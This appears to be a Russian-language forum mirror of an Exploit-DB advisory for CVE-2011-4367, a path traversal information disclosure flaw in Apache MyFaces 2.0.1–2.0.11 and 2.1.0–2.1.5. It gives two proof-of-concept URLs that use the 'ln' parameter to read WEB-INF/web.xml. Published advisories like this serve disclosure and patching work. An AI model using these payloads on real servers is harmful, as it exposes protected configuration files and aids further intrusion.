- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 36681
- Проверка EDB
-
- Пройдено
- Автор
- PAUL NICOLUCCI
- Тип уязвимости
- REMOTE
- Платформа
- MULTIPLE
- CVE
- cve-2011-4367
- Дата публикации
- 2012-02-09
Apache MyFaces - 'ln' Information Disclosure
Код:
source: https://www.securityfocus.com/bid/51939/info
Apache MyFaces is prone to a remote information-disclosure vulnerability.
Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
The following versions are affected:
Apache MyFaces 2.0.1 through 2.0.11
Apache MyFaces 2.1.0 through 2.1.5
http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF
http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF- Источник
- www.exploit-db.com
